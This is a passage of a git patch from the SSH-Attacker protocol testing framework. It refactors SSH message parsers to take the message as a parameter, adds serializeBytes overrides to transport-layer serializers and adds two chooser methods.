} + }*/ @Override - protected void parseMessageSpecificContents() { - parseServiceName(); + protected void parseMessageSpecificContents(ServiceRequestMessage message) { + parseServiceName(message); } @Override public void parse(ServiceRequestMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/UnimplementedMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/UnimplementedMessageParser.java index 6ad4a8c05..90805d8bb 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/UnimplementedMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/UnimplementedMessageParser.java @@ -32,23 +32,25 @@ public UnimplementedMessageParser(InputStream stream) { super(stream); } - private void parseSequenceNumber() { + private void parseSequenceNumber(UnimplementedMessage message) { message.setSequenceNumber(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Sequence number: " + message.getSequenceNumber()); } - @Override - public UnimplementedMessage createMessage() { - return new UnimplementedMessage(); - } + /* + @Override + public UnimplementedMessage createMessage() { + return new UnimplementedMessage(); + } + */ @Override - protected void parseMessageSpecificContents() { - parseSequenceNumber(); + protected void parseMessageSpecificContents(UnimplementedMessage message) { + parseSequenceNumber(message); } @Override public void parse(UnimplementedMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/UnknownMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/UnknownMessageParser.java index 0ad4c4fba..0828e10c6 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/UnknownMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/UnknownMessageParser.java @@ -32,13 +32,15 @@ public UnknownMessageParser(InputStream stream) { super(stream); } - @Override - public UnknownMessage createMessage() { - return new UnknownMessage(); - } + /* + @Override + public UnknownMessage createMessage() { + return new UnknownMessage(); + } + */ @Override - protected void parseMessageSpecificContents() { + protected void parseMessageSpecificContents(UnknownMessage message) { message.setPayload(parseArrayOrTillEnd(-1)); LOGGER.debug( "Payload: " + ArrayConverter.bytesToRawHexString(message.getPayload().getValue())); @@ -46,6 +48,6 @@ protected void parseMessageSpecificContents() { @Override public void parse(UnknownMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/VersionExchangeMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/VersionExchangeMessageParser.java index 60a7643c7..b12391d99 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/VersionExchangeMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/VersionExchangeMessageParser.java @@ -32,12 +32,12 @@ public VersionExchangeMessageParser(InputStream stream) { super(stream); } - @Override + /*@Override protected VersionExchangeMessage createMessage() { return new VersionExchangeMessage(); - } + }*/ - private void parseVersion() { + private void parseVersion(VersionExchangeMessage message) { // parse till CR NL (and remove them) String result = this.parseStringTill(CharConstants.NEWLINE); if (result.contains("\r")) { @@ -59,13 +59,13 @@ private void parseVersion() { } } - @Override - public void parseProtocolMessageContents() { - parseVersion(); + // @Override + public void parseProtocolMessageContents(VersionExchangeMessage message) { + parseVersion(message); } @Override public void parse(VersionExchangeMessage message) { - parseProtocolMessageContents(); + parseProtocolMessageContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/AsciiMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/AsciiMessageSerializer.java index b5529a829..f10bbfba7 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/AsciiMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/AsciiMessageSerializer.java @@ -43,9 +43,15 @@ private void serializeEndOfMessageSequence() { appendString(message.getEndOfMessageSequence().getValue(), StandardCharsets.US_ASCII); } - @Override + // @Override protected void serializeProtocolMessageContents() { serializeText(); serializeEndOfMessageSequence(); } + + @Override + protected byte[] serializeBytes() { + serializeProtocolMessageContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DebugMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DebugMessageSerializer.java index 3f0a3cd30..7e96a686d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DebugMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DebugMessageSerializer.java @@ -54,4 +54,10 @@ public void serializeMessageSpecificContents() { serializeMessage(); serializeLanguageTag(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeGroupMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeGroupMessageSerializer.java index 0bcd4901c..46d842a97 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeGroupMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeGroupMessageSerializer.java @@ -51,4 +51,10 @@ public void serializeMessageSpecificContents() { serializeGroupModulus(); serializeGroupGenerator(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeInitMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeInitMessageSerializer.java index f1278ae3d..3b26b25f4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeInitMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeInitMessageSerializer.java @@ -38,4 +38,10 @@ private void serializeEphemeralPublicKey() { public void serializeMessageSpecificContents() { serializeEphemeralPublicKey(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeOldRequestMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeOldRequestMessageSerializer.java index cd0ce9834..088c84c89 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeOldRequestMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeOldRequestMessageSerializer.java @@ -31,4 +31,10 @@ private void serializePreferredGroupSize() { public void serializeMessageSpecificContents() { serializePreferredGroupSize(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeReplyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeReplyMessageSerializer.java index d062cbb24..1e88bc1ed 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeReplyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeReplyMessageSerializer.java @@ -58,4 +58,10 @@ public void serializeMessageSpecificContents() { serializeEphemeralPublicKey(); serializeSignature(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeRequestMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeRequestMessageSerializer.java index cc2ad0e7a..8c1fe6944 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeRequestMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeRequestMessageSerializer.java @@ -43,4 +43,10 @@ public void serializeMessageSpecificContents() { serializePreferredGroupSize(); serializeMaximalGroupSize(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeInitMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeInitMessageSerializer.java index a2df8f7db..a70d1f422 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeInitMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeInitMessageSerializer.java @@ -38,4 +38,10 @@ private void serializeEphemeralPublicKey() { public void serializeMessageSpecificContents() { serializeEphemeralPublicKey(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeReplyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeReplyMessageSerializer.java index e6f7d7708..aee911344 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeReplyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeReplyMessageSerializer.java @@ -58,4 +58,10 @@ public void serializeMessageSpecificContents() { serializeEphemeralPublicKey(); serializeSignature(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DisconnectMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DisconnectMessageSerializer.java index 4bc2f81ce..693b18f35 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DisconnectMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DisconnectMessageSerializer.java @@ -57,4 +57,10 @@ public void serializeMessageSpecificContents() { serializeDescription(); serializeLanguageTag(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeInitMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeInitMessageSerializer.java index 93d965187..c993a8693 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeInitMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeInitMessageSerializer.java @@ -41,4 +41,10 @@ private void serializeEphemeralPublicKey() { public void serializeMessageSpecificContents() { serializeEphemeralPublicKey(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeReplyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeReplyMessageSerializer.java index a2882a082..a841af16d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeReplyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeReplyMessageSerializer.java @@ -56,4 +56,10 @@ public void serializeMessageSpecificContents() { serializeEphemeralPublicKey(message); serializeSignature(message); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeInitMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeInitMessageSerializer.java index 10dee8afe..ac9869b14 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeInitMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeInitMessageSerializer.java @@ -59,4 +59,10 @@ public void serializeMessageSpecificContents() { LOGGER.debug("HybridKeyLength: " + length); LOGGER.debug("HybridKeyBytes: " + ArrayConverter.bytesToHexString(keys)); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeReplyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeReplyMessageSerializer.java index 8ba3e6cdf..393b2cc02 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeReplyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeReplyMessageSerializer.java @@ -83,4 +83,10 @@ private void serializeSignature() { appendBytes(message.getSignature().getValue()); LOGGER.debug("Signature: " + message.getSignature()); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/IgnoreMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/IgnoreMessageSerializer.java index 769eece7b..0b121b7d5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/IgnoreMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/IgnoreMessageSerializer.java @@ -33,4 +33,10 @@ private void serializeData() { public void serializeMessageSpecificContents() { serializeData(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/KeyExchangeInitMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/KeyExchangeInitMessageSerializer.java index 4f4139359..94fb09f08 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/KeyExchangeInitMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/KeyExchangeInitMessageSerializer.java @@ -198,4 +198,10 @@ public void serializeMessageSpecificContents() { serializeFirstKeyExchangePacketFollows(); serializeReserved(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/NewKeysMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/NewKeysMessageSerializer.java index c73da6fa9..b4b68a84b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/NewKeysMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/NewKeysMessageSerializer.java @@ -18,4 +18,10 @@ public NewKeysMessageSerializer(NewKeysMessage message) { @Override public void serializeMessageSpecificContents() {} + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeDoneMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeDoneMessageSerializer.java index 35662d2aa..97ba2bfff 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeDoneMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeDoneMessageSerializer.java @@ -33,4 +33,10 @@ private void serializeSignature() { public void serializeMessageSpecificContents() { serializeSignature(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangePubkeyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangePubkeyMessageSerializer.java index cb362e640..e421ab584 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangePubkeyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangePubkeyMessageSerializer.java @@ -44,4 +44,10 @@ public void serializeMessageSpecificContents() { serializeHostKeyBytes(); serializeTransientPublicKey(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeSecretMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeSecretMessageSerializer.java index 6b80f7ee4..d56ea8b63 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeSecretMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeSecretMessageSerializer.java @@ -37,4 +37,10 @@ private void serializeEncryptedSecret() { public void serializeMessageSpecificContents() { serializeEncryptedSecret(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceAcceptMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceAcceptMessageSerializer.java index 69be58bb5..d2ee30adc 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceAcceptMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceAcceptMessageSerializer.java @@ -36,4 +36,10 @@ private void serializeServiceName() { public void serializeMessageSpecificContents() { serializeServiceName(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceRequestMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceRequestMessageSerializer.java index 0be387f55..2d981d65e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceRequestMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceRequestMessageSerializer.java @@ -36,4 +36,10 @@ private void serializeServiceName() { public void serializeMessageSpecificContents() { serializeServiceName(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnimplementedMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnimplementedMessageSerializer.java index 662c24cca..e2d13aa58 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnimplementedMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnimplementedMessageSerializer.java @@ -25,4 +25,10 @@ private void serializeSequenceNumber() { public void serializeMessageSpecificContents() { serializeSequenceNumber(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnknownMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnknownMessageSerializer.java index ce7185fa1..c8e2c5d92 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnknownMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnknownMessageSerializer.java @@ -26,4 +26,10 @@ public void serializeMessageSpecificContents() { LOGGER.debug("Payload: " + ArrayConverter.bytesToHexString(message.getPayload())); appendBytes(message.getPayload().getValue()); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/VersionExchangeMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/VersionExchangeMessageSerializer.java index 09e034d58..fe7047b28 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/VersionExchangeMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/VersionExchangeMessageSerializer.java @@ -54,10 +54,16 @@ private void serializeEndOfMessageSequence() { appendString(message.getEndOfMessageSequence().getValue(), StandardCharsets.US_ASCII); } - @Override + // @Override protected void serializeProtocolMessageContents() { serializeVersion(); serializeComment(); serializeEndOfMessageSequence(); } + + @Override + protected byte[] serializeBytes() { + serializeProtocolMessageContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/State.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/State.java index 54a00502f..271f67022 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/State.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/State.java @@ -57,7 +57,6 @@ public class State { private final Config config; private RunningModeType runningMode; - public long getStartTimestamp() { return startTimestamp; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/DefaultWorkflowExecutor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/DefaultWorkflowExecutor.java index 84ebf4f06..53fed5869 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/DefaultWorkflowExecutor.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/DefaultWorkflowExecutor.java @@ -81,7 +81,6 @@ && isDisconnectMessageReceived())) { LOGGER.info("Workflow was not executed as planned."); } - if (state.getConfig().getResetWorkflowtracesBeforeSaving()) { state.getWorkflowTrace().reset(); } @@ -100,8 +99,8 @@ protected void executeAction(SshAction action, State state) throws SkipActionExc state.setExecutionException(ex); throw ex; } catch (UnsupportedOperationException - | PreparationException - | ActionExecutionException ex) { + | PreparationException + | ActionExecutionException ex) { state.setExecutionException(ex); LOGGER.warn("Not fatal error during action execution, skipping action: " + action, ex); throw new SkipActionException(ex); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java index 3cfebdfba..7841b05e2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java @@ -118,8 +118,6 @@ public void initTransportHandler(Context context) { }*/ } - - try { if (getBeforeTransportPreInitCallback() != null) { getBeforeTransportPreInitCallback().apply(state); @@ -142,6 +140,7 @@ public void initTransportHandler(Context context) { ex); } } + public void closeConnection() { for (Context context : state.getAllContexts()) { try { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/Chooser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/Chooser.java index 196cc1432..eb42abf0a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/Chooser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/Chooser.java @@ -122,6 +122,10 @@ public Context getContext() { public abstract PublicKeyAlgorithm getHostKeyAlgorithm(); + public abstract ConnectionEndType getMyConnectionPeer(); + + public abstract byte[] getLastHandledAuthenticationMessageData(); + /** * Returns the encryption algorithm for outgoing packets (send). Internally, this either calls * getEncryptionAlgorithmClientToServer() or getEncryptionAlgorithmServerToClient(), depending diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java index 117485af3..ced816497 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java @@ -18,6 +18,7 @@ import de.rub.nds.sshattacker.core.state.Context; import de.rub.nds.tlsattacker.transport.Connection; import de.rub.nds.tlsattacker.transport.ConnectionEndType; +import java.nio.charset.StandardCharsets; import java.util.Arrays; import java.util.List; import java.util.Map; @@ -588,6 +589,27 @@ public PublicKeyAlgorithm getHostKeyAlgorithm() { }); } + @Override + public ConnectionEndType getMyConnectionPeer() { + return getConnection().getLocalConnectionEndType() == ConnectionEndType.CLIENT + ? ConnectionEndType.SERVER + : ConnectionEndType.CLIENT; + } + + @Override + public byte[] getLastHandledAuthenticationMessageData() { + if (context.getSshContext().getLastHandledAuthenticationMessageData() != null) { + return copy(context.getSshContext().getLastHandledAuthenticationMessageData()); + } else { + return config.getDefaultAuthenticationMessageData() + .getBytes(StandardCharsets.ISO_8859_1); + } + } + + private byte[] copy(byte[] array) { + return org.bouncycastle.util.Arrays.copyOf(array, array.length); + } + /** * Retrieves the negotiated encryption algorithm for client to server communication from * context. If the field is not set in context, this method will try to pick the negotiated From f3954868beba9b7db6f7466c77bedc82edd4b822 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Steffen=20Bro=C3=9Fler?= Date: Thu, 8 Jun 2023 01:45:09 +0200 Subject: [PATCH 008/176] wip: Using the exisiting Paket-Constuct to build layercontext --- .idea/jarRepositories.xml | 5 ++ .idea/misc.xml | 2 +- .../core/layer/context/SshContext.java | 26 +++++++ .../core/layer/impl/TransportLayer.java | 68 +++++++++++++++---- .../core/packet/AbstractPacket.java | 9 ++- .../sshattacker/core/packet/BinaryPacket.java | 36 ++++++++-- .../sshattacker/core/packet/BlobPacket.java | 35 +++++++++- .../packet/handler/AbstractPacketHandler.java | 14 ++++ .../packet/handler/BinaryPacketHandler.java | 17 +++++ .../packet/handler/BlobPacketHandler.java | 18 +++++ .../packet/layer/AbstractPacketLayer.java | 8 +-- .../packet/parser/AbstractPacketParser.java | 8 ++- .../packet/parser/BinaryPacketParser.java | 17 ++++- .../core/packet/parser/BlobPacketParser.java | 13 +++- .../preparator/AbstractPacketPreparator.java | 4 +- .../preparator/BinaryPacketPreparator.java | 2 + .../preparator/BlobPacketPreparator.java | 2 + .../serializer/AbstractPacketSerializer.java | 2 +- .../protocol/common/layer/MessageLayer.java | 11 ++- 19 files changed, 257 insertions(+), 40 deletions(-) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/AbstractPacketHandler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BinaryPacketHandler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BlobPacketHandler.java diff --git a/.idea/jarRepositories.xml b/.idea/jarRepositories.xml index 12c006d3b..fab48e1dd 100644 --- a/.idea/jarRepositories.xml +++ b/.idea/jarRepositories.xml @@ -6,6 +6,11 @@ - + \ No newline at end of file diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index c0a5a3498..31e0ae054 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -17,8 +17,11 @@ import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import 